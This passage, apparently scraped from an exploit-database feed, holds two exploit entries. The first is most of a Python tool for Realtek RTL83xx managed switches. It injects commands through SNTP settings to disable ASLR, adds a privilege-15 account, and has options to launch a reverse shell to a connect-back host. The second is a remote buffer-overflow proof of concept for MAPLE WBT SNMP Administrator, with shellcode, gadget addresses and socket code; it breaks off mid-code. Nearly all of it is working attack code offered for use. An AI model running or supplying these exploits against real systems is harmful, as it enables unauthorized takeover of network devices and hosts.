HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\t\t\t\tresponse = response.read()\r\n\t\t\t\t\tresult = json.loads(response)\r\n\t\t\t\t\tDEBUG(\"RECV\",result)\r\n\r\n\t\t\t\t\tif result['status'] == 'ok' and result['msgType'] == 'save_success':\r\n\t\t\t\t\t\tclear_log.success(\"Success\")\r\n\t\t\t\t\t\treturn 
True\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tclear_log.failure(\"Failed\")\r\n\t\t\t\t\t\treturn False\r\n\t\t\t\telse:\r\n\t\t\t\t\tclear_log.failure(\"Failed\")\r\n\t\t\t\t\treturn False\r\n\r\n\t\texcept Exception as e:\r\n\t\t\tlog.info(\"error {}\".format(e))\r\n\t\t\treturn False\r\n\r\n\t\tclear_log.failure(\"LOG Failed\")\r\n\t\treturn False\r\n\r\n\t#\r\n\t# Access: Authenticated\r\n\t#\r\n\tdef SNTP(self, target):\r\n\t\tself.target = target\r\n\r\n\t\tSNTP = log.progress(\"SNTP\")\r\n\r\n\t\tif not self.target['exploit']['sntp']['vulnerable']:\r\n\t\t\tSNTP.failure(\"Not listed as vulnerable\")\r\n\t\t\treturn False\r\n\r\n\t\tSNTP.status(\"Trying...\")\r\n\r\n\t\tif self.check_XSID(self.target):\r\n\t\t\tself.headers['X-CSRF-XSID'] = self.Cisco_XSID(self.target)\r\n\r\n\t\tSNTP.status(\"Enable SNTP\")\r\n\r\n\t\tURI = self.target['exploit']['sntp']['enable_uri']\r\n\t\tquery_args = self.target['exploit']['sntp']['enable_query']\r\n\r\n\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\tresponse = response.read()\r\n\r\n\t\tif not self.target['exploit']['sntp']['json']:\r\n\t\t\tresponse = re.split(\"[<>\\n]\",response)\r\n\t\t\tDEBUG(\"RECV\",response)\r\n\r\n\t\t\tfor check in range(0,len(response)):\r\n\t\t\t\tif response[check] == 'SNTP':\r\n\t\t\t\t\tif response[check+5] == 'Enabled' or response[check+5] == 'Enable' or response[check+7] == 'Enabled' or response[check+7] == 'Enable':\r\n\t\t\t\t\t\tSNTP.status(\"SNTP Enabled\")\r\n\t\t\t\t\telif response[check+5] == 'Disabled' or response[check+5] == 'Disable' or response[check+7] == 'Disabled' or response[check+7] == 'Disable':\r\n\t\t\t\t\t\tSNTP.failure(\"SNTP Disabled\")\r\n\t\t\t\t\t\treturn False\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tSNTP.failure(\"Enable SNTP Failed\")\r\n\t\t\t\t\t\treturn False\r\n\r\n\t\telse: # json\r\n\t\t\tresponse = self.clean_json(response)\r\n\t\t\tresult = 
json.loads(response)\r\n\t\t\tDEBUG(\"RECV\",result)\r\n\r\n\t\t\tif result['status'] == 'ok' and result['msgType'] == 'save_success':\r\n\t\t\t\tURI = self.target['exploit']['sntp']['status_uri']\r\n\t\t\t\tDEBUG(\"SEND\",URI)\r\n\r\n\t\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded\r\n\t\t\t\tresponse = response.read()\r\n\t\t\t\tresponse = self.clean_json(response)\r\n\t\t\t\tresult = json.loads(response)\r\n\t\t\t\tDEBUG(\"RECV\",result)\r\n\r\n\t\t\t\tfor status in result['data']:\r\n\t\t\t\t\tif status == 'sntp' and result['data']['sntp'] == True:\r\n\t\t\t\t\t\tSNTP.status(\"SNTP Enabled\")\r\n\t\t\t\t\t\tbreak\r\n\t\t\t\t\telif status == 'sntp' and result['data']['sntp'] == False:\r\n\t\t\t\t\t\tSNTP.failure(\"SNTP Disabled\")\r\n\t\t\t\t\t\treturn False\r\n\t\t\t\t\telif status == 'sntpStatus' and result['data']['sntpStatus'] == True:\r\n\t\t\t\t\t\tSNTP.status(\"SNTP Enabled\")\r\n\t\t\t\t\t\tbreak\r\n\t\t\t\t\telif status == 'sntpStatus' and result['data']['sntpStatus'] == False:\r\n\t\t\t\t\t\tSNTP.failure(\"SNTP Disabled\")\r\n\t\t\t\t\t\treturn False\r\n\r\n\t\t\telse:\r\n\t\t\t\tSNTP.failure(\"Enable SNTP Failed\")\r\n\t\t\t\treturn False\r\n\r\n\t\tURI = self.target['exploit']['sntp']['inject_uri']\r\n\t\tquery_args = self.target['exploit']['sntp']['inject_query']\r\n\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\tresponse = response.read()\r\n\t\tif not self.target['exploit']['sntp']['json']:\r\n\t\t\tresponse = response.split('\"')\r\n\t\t\tDEBUG(\"RECV\",response)\r\n\r\n\t\t\tfor check in range(0,len(response)):\r\n\t\t\t\tif response[check] == '/cgi-bin/dispatcher.cgi?cmd=549':\r\n\t\t\t\t\tquery_args = self.target['exploit']['sntp']['check_query']\r\n\t\t\t\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\t\t\t\tresponse = 
HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\t\t\t\tresponse = response.read()\r\n\t\t\t\t\tresponse = response.split('\"')\r\n\t\t\t\t\tDEBUG(\"RECV\",response)\r\n\r\n\t\t\t\t\tfor check in range(0,len(response)):\r\n\t\t\t\t\t\tif response[check] == '/cgi-bin/dispatcher.cgi?cmd=549':\r\n\t\t\t\t\t\t\tURI = self.target['exploit']['sntp']['verify_uri']\r\n\t\t\t\t\t\t\tDEBUG(\"SEND\",URI)\r\n\r\n\t\t\t\t\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded\r\n\t\t\t\t\t\t\tresponse = response.read().split()\r\n\t\t\t\t\t\t\tDEBUG(\"RECV\",response)\r\n\r\n\t\t\t\t\t\t\tif response[0] == '0':\r\n\t\t\t\t\t\t\t\tSNTP.status(\"ASLR disabled\")\r\n\t\t\t\t\t\t\t\tbreak\r\n\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\tSNTP.failure(\"Check Failed\")\r\n\t\t\t\t\t\t\t\treturn False\r\n\t\t\t\t\tbreak\r\n\r\n\r\n\t\telse: # json\r\n\t\t\tresponse = self.clean_json(response)\r\n\t\t\tresult = json.loads(response)\r\n\t\t\tDEBUG(\"RECV\",result)\r\n\r\n\t\t\tif result['status'] == 'ok' and result['msgType'] == 'save_success':\r\n\t\t\t\tquery_args = self.target['exploit']['sntp']['check_query']\r\n\t\t\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\t\t\tresponse = response.read()\r\n\t\t\t\tresponse = self.clean_json(response)\r\n\t\t\t\tresult = json.loads(response)\r\n\t\t\t\tDEBUG(\"RECV\",result)\r\n\r\n\t\t\t\tif result['status'] == 'ok' and result['msgType'] == 'save_success':\r\n\t\t\t\t\tURI = self.target['exploit']['sntp']['verify_uri']\r\n\t\t\t\t\tDEBUG(\"SEND\",URI)\r\n\r\n\t\t\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded\r\n\t\t\t\t\tresponse = response.read().split()\r\n\t\t\t\t\tDEBUG(\"RECV\",response)\r\n\r\n\t\t\t\t\tif 
response[0] == '0':\r\n\t\t\t\t\t\tSNTP.status(\"ASLR disabled\")\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tSNTP.failure(\"Check Failed\")\r\n\t\t\t\t\t\treturn False\r\n\t\t\t\telse:\r\n\t\t\t\t\tSNTP.failure(\"RCE #2 Failed\")\r\n\t\t\t\t\treturn False\r\n\t\t\telse:\r\n\t\t\t\tSNTP.failure(\"RCE #1 Failed\")\r\n\t\t\t\treturn False\r\n\r\n\t\tSNTP.status(\"Removing RCE\")\r\n\t\tURI = self.target['exploit']['sntp']['delete_uri']\r\n\t\tquery_args = self.target['exploit']['sntp']['delete_query']\r\n\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\tresponse = response.read()\r\n\t\tif not self.target['exploit']['sntp']['json']:\r\n\t\t\tresponse = response.split('\"')\r\n\t\t\tDEBUG(\"RECV\",response)\r\n\r\n\t\t\tfor check in range(0,len(response)):\r\n\t\t\t\tif response[check] == '/cgi-bin/dispatcher.cgi?cmd=549':\r\n\t\t\t\t\tSNTP.status(\"RCE Removed\")\r\n\t\t\t\t\tbreak\r\n\t\telse: # json\r\n\t\t\tresponse = self.clean_json(response)\r\n\t\t\tresult = json.loads(response)\r\n\t\t\tDEBUG(\"RECV\",result)\r\n\r\n\t\t\tif result['status'] == 'ok' and result['msgType'] == 'save_success':\r\n\t\t\t\tSNTP.status(\"RCE Removed\")\r\n\t\t\telse:\r\n\t\t\t\tSNTP.failure(\"RCE Remove Failed\")\r\n\t\t\t\treturn False\r\n\r\n\t\tURI = self.target['exploit']['sntp']['disable_uri']\r\n\t\tquery_args = self.target['exploit']['sntp']['disable_query']\r\n\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\tresponse = response.read()\r\n\t\tif not self.target['exploit']['sntp']['json']:\r\n\t\t\tresponse = re.split(\"[<>\\n]\",response)\r\n\t\t\tDEBUG(\"RECV\",response)\r\n\r\n\t\t\tfor check in range(0,len(response)):\r\n\t\t\t\tif response[check] == 'SNTP':\r\n\r\n\t\t\t\t\tif response[check+5] == 'Enabled' or response[check+5] == 
'Enable' or response[check+7] == 'Enabled' or response[check+7] == 'Enable':\r\n\t\t\t\t\t\tSNTP.failure(\"SNTP Enabled\")\r\n\t\t\t\t\telif response[check+5] == 'Disabled' or response[check+5] == 'Disable' or response[check+7] == 'Disabled' or response[check+7] == 'Disable':\r\n\t\t\t\t\t\tSNTP.status(\"SNTP Disabled\")\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tSNTP.failure(\"Disable SNTP Failed\")\r\n\t\t\t\t\t\treturn False\r\n\r\n\t\telse: # json\r\n\t\t\tresponse = self.clean_json(response)\r\n\t\t\tresult = json.loads(response)\r\n\t\t\tDEBUG(\"RECV\",result)\r\n\r\n\t\t\tif result['status'] == 'ok' and result['msgType'] == 'save_success':\r\n\t\t\t\tURI = self.target['exploit']['sntp']['status_uri']\r\n\t\t\t\tDEBUG(\"SEND\",URI)\r\n\r\n\t\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded\r\n\t\t\t\tresponse = response.read()\r\n\t\t\t\tresponse = self.clean_json(response) # MCW TEST\r\n\t\t\t\tresult = json.loads(response)\r\n\t\t\t\tDEBUG(\"RECV\",result)\r\n\r\n\t\t\t\tfor status in result['data']:\r\n\t\t\t\t\tif status == 'sntp' and result['data']['sntp'] == True:\r\n\t\t\t\t\t\tSNTP.failure(\"SNTP Enabled\")\r\n\t\t\t\t\t\treturn False\r\n\t\t\t\t\telif status == 'sntp' and result['data']['sntp'] == False:\r\n\t\t\t\t\t\tSNTP.status(\"SNTP Disabled\")\r\n\t\t\t\t\t\tbreak\r\n\t\t\t\t\telif status == 'sntpStatus' and result['data']['sntpStatus'] == True:\r\n\t\t\t\t\t\tSNTP.failure(\"SNTP Enabled\")\r\n\t\t\t\t\t\treturn False\r\n\t\t\t\t\telif status == 'sntpStatus' and result['data']['sntpStatus'] == False:\r\n\t\t\t\t\t\tSNTP.status(\"SNTP Disabled\")\r\n\t\t\t\t\t\tbreak\r\n\r\n\t\t\telse:\r\n\t\t\t\tSNTP.failure(\"Disable SNTP Failed\")\r\n\t\t\t\treturn False\r\n\r\n\r\n\t\tSNTP.success(\"ASLR: Success\")\r\n\t\treturn True\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n\t#\r\n\t# Help, info and pre-defined values\r\n\t#\t\r\n\tINFO = 'Realtek Managed Switch Controller RTL83xx PoC 
(2019 bashis)\\n'\r\n\tHTTP = \"http\"\r\n\tHTTPS = \"https\"\r\n\tproto = HTTP\r\n\tverbose = False\r\n\traw_request = True\r\n\trhost = '192.168.57.20'\t# Default Remote HOST\r\n\trport = '80'\t\t\t# Default Remote PORT\r\n\tlhost = '192.168.57.1'\t# Default Local HOST\r\n\tlport = '1337'\t\t\t# Default Local PORT\r\n\tcreds = 'pwn:pwn'\t\t# creds = 'user:pass'\r\n\tetag = ''\r\n\r\n\t#\r\n\t# Try to parse all arguments\r\n\t#\r\n\ttry:\r\n\t\targ_parser = argparse.ArgumentParser(\r\n\t\tprog=sys.argv[0],\r\n\t\t\t\tdescription=('[*] '+ INFO +' [*]'))\r\n\t\targ_parser.add_argument('--rhost', required=False, help='Remote Target Address (IP/FQDN) [Default: '+ rhost +']')\r\n\t\targ_parser.add_argument('--rport', required=False, help='Remote Target HTTP/HTTPS Port [Default: '+ rport +']')\r\n\t\targ_parser.add_argument('--lhost', required=False, help='Connect Back Address (IP/FQDN) [Default: '+ lhost +']')\r\n\t\targ_parser.add_argument('--lport', required=False, help='Connect Back Port [Default: '+ lport + ']')\r\n\t\tif creds:\r\n\t\t\targ_parser.add_argument('--auth', required=False, help='Basic Authentication [Default: '+ creds + ']')\r\n\t\targ_parser.add_argument('--https', required=False, default=False, action='store_true', help='Use HTTPS for remote connection [Default: HTTP]')\r\n\r\n\t\targ_parser.add_argument('--hydra', required=False, default=False, action='store_true', help='Boa/Hydra Web Server - reverse shell')\r\n\t\targ_parser.add_argument('--force', required=False, default=False, action='store_true', help='Ignore warnings for exploits marked not safe')\r\n\t\targ_parser.add_argument('--etag', required=False, help='Select target manually with their ETag')\r\n\r\n\t\targ_parser.add_argument('--shell', required=False, default=False, action='store_true', help='Unauthenticated - reverse shell - CGIs')\r\n\r\n\t\targ_parser.add_argument('--debug', required=False, default=False, action='store_true', help='Debug SEND/RECV data and line numbers in 
code')\r\n\r\n\t\targ_parser.add_argument('--verify', required=False, default=False, action='store_true', help='Verify unauthenticated vulnerabilities - CGIs')\r\n\t\targ_parser.add_argument('--report', required=False, default=False, action='store_true', help='Generate report based on dictionary')\r\n\r\n\t\targ_parser.add_argument('--adduser', required=False, default=False, action='store_true', help='Add \"'+ creds + '\" with privilege 15')\r\n\t\targ_parser.add_argument('--deluser', required=False, default=False, action='store_true', help='Delete \"'+ creds + '\" credentials')\r\n\r\n\t\targs = arg_parser.parse_args()\r\n\texcept Exception as e:\r\n\t\tlog.info(INFO)\r\n\t\tlog.info(\"Error: {}\".format(e))\r\n\t\tsys.exit(1)\r\n\r\n\t# We want at least one argument, so print out help\r\n\tif len(sys.argv) == 1:\r\n\t\targ_parser.parse_args(['-h'])\r\n\r\n\tprint \"\"\r\n\tlog.info(INFO)\r\n\r\n\tif args.report:\r\n\t\tVendor(\"report\").dict()\r\n\t\tsys.exit(0)\r\n\r\n\tif args.debug:\r\n\t\tdebug = True\r\n\r\n\tif args.force:\r\n\t\tforce = True\r\n\t#\r\n\t# Check validity, update if needed, of provided options\r\n\t#\r\n\tif args.https:\r\n\t\tproto = HTTPS\r\n\t\tif not args.rport:\r\n\t\t\trport = '443'\r\n\r\n\tif creds and args.auth:\r\n\t\tcreds = args.auth\r\n\r\n\tif args.rport:\r\n\t\trport = args.rport\r\n\r\n\tif args.etag:\r\n\t\tetag = args.etag\r\n\r\n\tif args.rhost:\r\n\t\trhost = args.rhost\r\n\r\n\tif args.lport:\r\n\t\tlport = args.lport\r\n\r\n\tif args.lhost:\r\n\t\tlhost = args.lhost\r\n\r\n\t# Check if RPORT is valid\r\n\tif not Validate(verbose).Port(rport):\r\n\t\tlog.failure(\"Invalid RPORT - Choose between 1 and 65535\")\r\n\t\tsys.exit(1)\r\n\r\n\t# Check if LPORT is valid\r\n\tif not Validate(verbose).Port(lport): #\r\n\t\tlog.failure(\"Invalid LPORT - Choose between 1 and 65535\")\r\n\t\tsys.exit(1)\r\n\r\n\t# Let's break apart the hex code of LPORT into two bytes and check for badbyte 0x00\r\n\tport_hex = 
hex(int(lport))[2:]\r\n\tport_hex = port_hex.zfill(len(port_hex) + len(port_hex) % 2)\r\n\tport_hex = ' '.join(port_hex[i: i+2] for i in range(0, len(port_hex), 2))\r\n\tport_hex = port_hex.split()\r\n\tif len(port_hex) == 1:\r\n\t\tport_hex = ('00' + ' ' + ''.join(port_hex)).split()\r\n\r\n\tfor c in port_hex:\r\n\t\tif c == '00':\r\n\t\t\tlog.failure(\"Choosen port (dec: {}, hex: {}) contains 0x00 - aborting\".format(lport,hex(int(lport))))\r\n\t\t\tsys.exit(1)\r\n\r\n\t# Check if RHOST is valid IP or FQDN, get IP back\r\n\trhost = Validate(verbose).Host(rhost)\r\n\tif not rhost:\r\n\t\tlog.failure(\"Invalid RHOST\")\r\n\t\tsys.exit(1)\r\n\r\n\t# Check if LHOST is valid IP or FQDN, get IP back\r\n\tlhost = Validate(verbose).Host(lhost)\r\n\tif not lhost:\r\n\t\tlog.failure(\"Invalid LHOST\")\r\n\t\tsys.exit(1)\r\n\r\n\t#\r\n\t# Validation done, start print out stuff to the user\r\n\t#\r\n\tif args.https:\r\n\t\tlog.info(\"HTTPS / SSL Mode Selected\")\r\n\tlog.info(\"RHOST: {}\".format(rhost))\r\n\tlog.info(\"RPORT: {}\".format(rport))\r\n\tlog.info(\"LHOST: {}\".format(lhost))\r\n\tlog.info(\"LPORT: {}\".format(lport))\r\n\r\n\trhost = rhost + ':' + rport\r\n\r\n\ttry:\r\n\r\n\t\theaders = {\r\n\t\t\t'Host':rhost,\r\n\t\t\t'User-Agent':'Chrome',\r\n\t\t\t'Accept':'*/*',\r\n\t\t\t'Content-Type':'application/x-www-form-urlencoded'\r\n\t\t\t}\r\n\t\t#\r\n\t\t# We can manually select target with the '--etag'\r\n\t\t#\r\n\t\ttarget = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).check_remote(etag)\r\n\r\n\t\t#\r\n\t\t# Whole code based on known 'target's ETag\r\n\t\t#\r\n\t\tif target:\r\n\r\n\t\t\tif args.verify:\r\n\t\t\t\tRTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).verify_target(target,True) # check all listed\r\n\r\n\t\t\telif args.hydra:\r\n\t\t\t\tif not target['exploit']['heack_hydra_shell']['safe'] and not args.force:\r\n\t\t\t\t\tlog.failure(\"Boa/Hydra listed as not safe (most likely DoS), force with 
'--force'\")\r\n\t\t\t\t\tlog.failure(\"The best chance of success is with fresh heap and select target model manually\")\r\n\t\t\t\t\tlog.failure(\"use '--etag' for manual selection, '--etag help' for known targets\")\r\n\t\t\t\t\tsuccess = False\r\n\t\t\t\telse:\r\n\t\t\t\t\tsuccess = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).heack_hydra_shell(target)\r\n\t\t\t\t\tsuccess = False\r\n\r\n\t\t\telif args.adduser:\r\n\t\t\t\tif target['exploit']['stack_cgi_add_account']['vulnerable']:\r\n\t\t\t\t\tsuccess = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).stack_add_account(target)\r\n\t\t\t\telse:\r\n\t\t\t\t\tsuccess = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).add_user(target)\r\n\r\n\t\t\telif args.deluser:\r\n\t\t\t\tif target['exploit']['stack_cgi_del_account']['vulnerable']:\r\n\t\t\t\t\tsuccess = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).stack_del_account(target)\r\n\t\t\t\telse:\r\n\t\t\t\t\tsuccess = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).login(target)\r\n\t\t\t\t\tif success:\r\n\t\t\t\t\t\tsuccess = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).del_user(target)\r\n\t\t\t\t\t\tif success:\r\n\t\t\t\t\t\t\tsuccess = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).logout(target)\r\n\r\n\t\t\telif args.shell:\r\n\t\t\t\tsuccess = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).verify_target(target,False) # check only one\r\n\r\n\t\t\t\t#\r\n\t\t\t\t# shellcode on heap, no need to disable ASLR\r\n\t\t\t\t#\r\n\t\t\t\tif not target['exploit']['heack_cgi_shell']['stack']:\r\n\t\t\t\t\tsuccess = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).stack_cgi_log(target)\r\n\t\t\t\t#\r\n\t\t\t\t# shellcode on stack, we need to disable ASLR\r\n\t\t\t\t#\r\n\t\t\t\telif target['exploit']['stack_cgi_diag']['vulnerable']:\r\n\t\t\t\t\tsuccess = RTK_RTL83xx(rhost, proto, 
verbose, creds, raw_request,lhost, lport).stack_cgi_log(target)\r\n\t\t\t\t\tif success:\r\n\t\t\t\t\t\tsuccess = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).stack_cgi_diag(target)\r\n\t\t\t\telif target['exploit']['stack_cgi_sntp']['vulnerable']:\r\n\t\t\t\t\tsuccess = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).stack_cgi_log(target)\r\n\t\t\t\t\tif success:\r\n\t\t\t\t\t\tsuccess = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).stack_cgi_sntp(target)\r\n\t\t\t\t#\r\n\t\t\t\t# or we take the long way\r\n\t\t\t\t#\r\n\t\t\t\telif target['login']['vulnerable'] and not target['exploit']['stack_cgi_diag']['vulnerable'] or not target['exploit']['stack_cgi_sntp']['vulnerable']:\r\n\t\t\t\t\tif not args.auth:\r\n\t\t\t\t\t\tsuccess = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).add_user(target)\r\n\t\t\t\t\tif success:\r\n\t\t\t\t\t\tsuccess = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).login(target)\r\n\t\t\t\t\tif success:\r\n\t\t\t\t\t\tsuccess = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).disable_clean_log(target)\r\n\t\t\t\t\tif success:\r\n\t\t\t\t\t\tsuccess = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).SNTP(target)\r\n\r\n\t\t\t\t\tif success and not args.auth:\r\n\t\t\t\t\t\tsuccess = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).del_user(target)\r\n\t\t\t\t\tif success:\r\n\t\t\t\t\t\tsuccess = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).logout(target)\r\n\r\n\t\t\t\telse:\r\n\t\t\t\t\tlog.failure(\"We have no way to reach shellcode...\")\r\n\t\t\t\t\tsuccess = False\r\n\r\n\t\t\t\t#\r\n\t\t\t\t# No meaning to try exploit if above failed\r\n\t\t\t\t#\r\n\t\t\t\tif success:\r\n\t\t\t\t\tRTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).heack_shell(target)\r\n\r\n\texcept Exception as e:\r\n\t\tlog.info(\"Failed: 
({})\".format(e))\r\n\r\n\tlog.info(\"All done...\")\r\n\r\n\tsys.exit(0)\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/33299"}, {"lastseen": "2019-12-04T04:01:59", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category remote exploits", "modified": "2019-07-17T00:00:00", "published": "2019-07-17T00:00:00", "id": "1337DAY-ID-32998", "href": "https://0day.today/exploit/description/32998", "title": "MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow Exploit", "type": "zdt", "sourceData": "# Exploit Title: MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow\r\n# Author: hyp3rlinx\r\n# Vendor Homepage: www.computerlab.com\r\n# Software Link: https://www.computerlab.com/index.php/downloads/category/27-device-manager\r\n# Software Link: ftp://downloads.computerlab.com/software/SnmpSetup.195.15.EXE\r\n# Tested on OS: Windows\r\n# CVE: CVE-2019-13577\r\n\r\n[+] Credits: John Page (aka hyp3rlinx)\t\t\r\n[+] Website: hyp3rlinx.altervista.org\r\n[+] Source: http://hyp3rlinx.altervista.org/advisories/MAPLE-WBT-SNMP-ADMINISTRATOR-v2.0.195.15-REMOTE-BUFFER-OVERFLOW-CODE-EXECUTION-0DAY.txt\r\n[+] ISR: Apparition Security \r\n \r\n\r\n[Vendor]\r\nwww.computerlab.com\r\n\r\n\r\n[Product]\r\nMAPLE Computer WBT SNMP Administrator (Thin Client Administrator)\r\nv2.0.195.15\r\n\r\nhttps://www.computerlab.com/index.php/downloads/category/27-device-manager\r\nftp://downloads.computerlab.com/software/SnmpSetup.195.15.EXE\r\nSnmpSetup.195.15.EXE - MD5 Hash: a3913aae166c11ddd21dca437e78c3f4\r\n\r\nThe CLI Thin Client Manager is designed to provide remote management and control of CLI Thin Clients.\r\nThis software is built on the TCP/IP industry standard SNMP (Simple Network Management Protocol).\r\nAgents are built into the clients for remote management and configuration.\r\n\r\n\r\n[Vulnerability 
Type]\r\nUnauthenticated Remote Buffer Overflow Code Execution 0day\r\n\r\n\r\n[CVE Reference]\r\nCVE-2019-13577\r\n\r\n\r\n[Security Issue]\r\nSnmpAdm.exe in MAPLE WBT SNMP Administrator v2.0.195.15 has an Unauthenticated Remote Buffer Overflow via a long string to the CE Remote feature listening on Port 987.\r\nThis will overwrite data on the stack/registers and allow control of the program's execution flow, resulting in attacker-supplied remote code execution.\r\nAuthentication is not required for this exploit.\r\n\r\nThis program seems to be packed using ASPack v2.12 and can be difficult to unpack because it uses self-modifying code.\r\nWhen installing the vulnerable program, if it asks for a serial number, just enter a value of \"1\" or something.\r\nUpon launching the program, if any errors occur, try right-clicking SnmpAdm.exe and running it as Administrator.\r\nInterestingly, it seems to drop DLLs with .tmp extensions in the AppData\\Local\\Temp directory; make OS system files viewable in Explorer to see them.\r\n\r\ne.g. C:\\Users\\blah\\AppData\\Local\\Temp\\~ip6B92.tmp\r\n\r\nASLR / Rebase / SafeSEH are all False for ipwSNMPv5.dll (see the gadget listing below), helping to make the exploit more portable. 
\r\n\r\nCALL EBX\r\n10008FB3 0x10008fb3 : call ebx | null {PAGE_EXECUTE_READ} [ipwSNMPv5.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.0.1364 (C:\\Program Files (x86)\\SnmpAdm\\ipwSNMPv5.dll)\r\n\r\nStack dump:\r\n\r\nEAX 41414141\r\nECX 0018FEFC\r\nEDX 0018FF10\r\nEBX 022DDA78 ASCII \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nESP 0018FECC\r\nEBP 0018FEF4\r\nESI 0018FF10\r\nEDI 0018FEFC\r\nEIP 41414141\r\nC 0 ES 002B 32bit 0(FFFFFFFF)\r\nP 1 CS 0023 32bit 0(FFFFFFFF)\r\nA 0 SS 002B 32bit 0(FFFFFFFF)\r\nZ 0 DS 002B 32bit 0(FFFFFFFF)\r\nS 0 FS 0053 32bit 7EFDD000(FFF)\r\nT 0 GS 002B 32bit 0(FFFFFFFF)\r\nD 0\r\nO 0 LastErr ERROR_NO_SCROLLBARS (000005A7)\r\nEFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)\r\n\r\n\r\n\r\n[Exploit/POC]\r\nfrom socket import *\r\nimport struct,sys,argparse\r\n\r\n#MAPLE WBT SNMP Administrator (SnmpAdm.exe) v2.0.195.15\r\n#CVE-2019-13577\r\n#Remote Buffer Overflow 0day\r\n#hyp3rlinx - ApparitionSec\r\n\r\n#Pop calc.exe Windows 7 SP1\r\nsc=(\"\\x31\\xF6\\x56\\x64\\x8B\\x76\\x30\\x8B\\x76\\x0C\\x8B\\x76\\x1C\\x8B\"\r\n\"\\x6E\\x08\\x8B\\x36\\x8B\\x5D\\x3C\\x8B\\x5C\\x1D\\x78\\x01\\xEB\\x8B\"\r\n\"\\x4B\\x18\\x8B\\x7B\\x20\\x01\\xEF\\x8B\\x7C\\x8F\\xFC\\x01\\xEF\\x31\"\r\n\"\\xC0\\x99\\x32\\x17\\x66\\xC1\\xCA\\x01\\xAE\\x75\\xF7\\x66\\x81\\xFA\"\r\n\"\\x10\\xF5\\xE0\\xE2\\x75\\xCF\\x8B\\x53\\x24\\x01\\xEA\\x0F\\xB7\\x14\"\r\n\"\\x4A\\x8B\\x7B\\x1C\\x01\\xEF\\x03\\x2C\\x97\\x68\\x2E\\x65\\x78\\x65\"\r\n\"\\x68\\x63\\x61\\x6C\\x63\\x54\\x87\\x04\\x24\\x50\\xFF\\xD5\\xCC\")\r\n\r\neip = struct.pack(\"<L\", 0x10008fb3) #JMP EBX\r\npopebx = struct.pack(\"<L\", 0x022C0012) #5B POP EBX\r\n\r\nbuf0=\"B\"*693704 \r\nbuf1=eip\r\nbuf2=popebx+sc+\"R\"*899+\"W\"*23975 \r\npayload=buf0+buf1+buf2\r\n\r\ndef doit(IP,payload):\r\n try:\r\n s=socket(AF_INET, SOCK_STREAM) \r\n 